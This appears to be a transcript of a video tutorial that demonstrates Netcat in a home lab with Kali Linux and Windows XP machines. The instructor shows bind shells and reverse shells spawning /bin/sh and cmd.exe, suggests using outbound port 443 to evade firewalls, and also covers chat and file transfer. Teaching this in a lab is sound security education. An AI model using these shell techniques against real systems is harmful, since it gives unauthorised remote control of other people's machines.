So IP address of this machine is 192.168.1.110, and I have another window for the same Kali machine, and over this IP address is also, as because this is the same machine, ifconfig IP address is 192.168.1.110. So first we will cover bind shell and reverse shell with respect to the Linux machine, and then we will cover same bind shell and reverse shell in respect to the Windows XP machine. So for example, I want to do a bind shell. So NC minus LVP. So LVP is basically a listener on which port we want to open a socket on this specific machine. So I have selected the port as 4444. So the moment I will hit enter, NC minus LVP 44444, one socket will open. But I want to bind a Linux shell with this socket. So to bind a shell, switch is minus E, and then similar to Windows CMD, in Linux shell is bin bash. So type /bin/sh. Let's do enter, and now I can see one socket is open which is listening on port number 444, and with this socket we have binded shell of Linux machine. Now we are on attacking machine. Now use Netcat to connect to this socket NC minus NV and then IP address of this machine 192.168.1.110, which port, which is 4.44444, and press enter. So we could see some connection. So I could see connect to this IP address from Kali because we are testing with same machine, so I can see source and destination is same. Now if I execute a command on the attacking machine, for example ID, I'm actually on that machine, so I could see commands are being executed. I'm on that specific machine. I could see ID is 0, which is root. If I execute who am I am root, and then fconfig. So 192.168.1.110. So you just need to upload NC to the target machine, and then with the help of NC we can open a socket, and if it is a Linux machine we can bind the bin bash with that socket, and then from the attacking machine or remote machine we can connect to that socket, and we will be able to control the complete machine. So this is known as bind shell. But in some cases this bind shell might not work because of the firewall restriction. So in that case, we use reverse shell. In case of reverse shell, that victim machine will connect back to the attacking machine, which is the outbound connection for the victim machine, and outbound traffic on well-known ports, for example 80, 443, 53, most of the time is allowed. So next lab I'm going to replicate is reverse shell using Netcat. So let me clear this session. Okay. So for example, this window is my victim and this window is my attacking machine. Now in this case, I will open a listener on the attacking machine, NC minus LVP 443, for example. So my attacking machine is listening for connections on port number 443. Now this is victim machine. Now victim machine will connect to attacking machine on IP address 192.168.1.110. Port number is 443, and I want to bind bin bash. Same thing, same concept. So we are going to do a Netcat on port 443, and we have binded bin bash with that specific connection with this socket. Enter. So I could see some connection back from 192.168.1.10 machine. Execute ID. Sorry, not on this window. On this window, ID. ID, yes, I can see connection back and bin bash has been binded. I can execute command who am I fconfig netstat minus rn, so I can execute everything on this command, on this shell. So this was reverse shell basically. So let me close this session. Okay, now how we can do a chat over this Netcat connection. For example, NC minus LVP, or let's do a set up a listener on this system, NC minus LVP 443. So one listener has been set up, one socket is open. Now try to connect to this socket, NC minus NV 192.168.1.110 and port number is 443. So I could see on both the windows connection has been made. Now let's type hi. So I could see same message over to other window. So from here I can type hello. I could see same message on my first window. You are hacked. So I could see messages are being transferred over a Netcat connections, and these messages are using raw TCP connection over port 443 to transfer these messages. So that's how we can also do a chat as well with the help of Netcat. Now I will replicate same stuff with the Windows machine. So I have Windows XP in my lab environment. So I'll replicate bind shell, reverse shell, and then we will try to replicate how files can be transferred over a Netcat connection. So let me minimize this. Windows XP, IP address of Windows XP is ipconfig. So 192.168.1.100, and I have one netcat exe which is already there in the netcat-1.11 folder, this nc.exe. Now go to command prompt. So first we are testing bind shell. So nc. So let me open a putty session for Kali as well here so that we can test. Let me see if I have putty. Yes, I have putty. Kali IP address is 192.168.1.110. Yes, username, password. Perfect. So let's set up a listener nc.exe minus lvp 443. So we have set up a listener, and now I want to bind cmd.exe with the socket. Enter. Back to Kali machine. nc minus nv 192.168.1.100, which is the Windows machine IP address, and port 443. So I should be able to see command prompt in response to this connection. So I have pressed enter. Let's wait for a few seconds and I should be able to see command prompt. I could see. So connection has been successful and I'm actually on the Windows. So I can execute all the commands which I can execute on this Windows XP machine. For example, ipconfig. I can execute, which is 192.168.1.100. What all users are created, net user, what all users are there on this machine. So these are the users which are there on this specific machine. So you can do everything with this connection. So let me do exit again and replicate same with the help of reverse shell. Now in this case, nc minus lvp 443, I'm a listener. Kali machine is a listener, attacking machine is a listener on port 443, and let me try to connect back to this Kali machine. So nc exe, then minus nv IP address 192.168.1.110 minus e to bind cmd.exe. The moment I'll press enter, I should be able to see again the command prompt on the Kali machine. Enter. I did not specify the port number. Okay, so after IP address it has to be port number 443 and then minus e cmd.exe. So the moment I have entered, I could see the command prompt back on my Kali machine. Same stuff, I can execute commands, I could see users, I could see what all services are running on this Windows machine. So everything I can execute on this machine. So reverse shell is always a better choice in comparison to bind shell, because there will be very less chances firewall will be blocking outbound traffic on well-known ports. Now next, last stuff for this video is how we can transfer files over a Netcat connection. For example, nc-exe minus lvp on port 443, and whatever comes on this connection, I want to create a file. I want to insert that information or data into a file called, for example, test.exe. So one exe, let me open another window. command prompt, go to this directory where netcat has been placed. Cd space documents and settings. Okay, so we have to be very careful with the codes because we have spaces in between the directories. Okay, sorry, cd, now it should work. Okay, so dir, so we don't see any test.exe as of now in this directory. So what I'm going to do is, I have set up a listener on 443 and the file name has been given as test.exe. Press enter. Okay, so from here nc minus nv 192.168.1.100 port number 443, and then I want to transfer the file, and the file has been, for example, located under user, share, Windows, binary. So under Windows binaries there is a file called wget.exe. I want to send this file to the target machine. Enter. Small limitation in this file transfer is we don't be able to get to know basically when that data transfer has been completed successfully. So let me go back to my other window of command prompt and execute dir. So we should be able to see test.exe. So we have test.exe. So we can successfully transfer files over Netcat connections. So that's all for this video. Thank you very much. If you have any questions, you can give me a call and do try to test these Netcat exercises.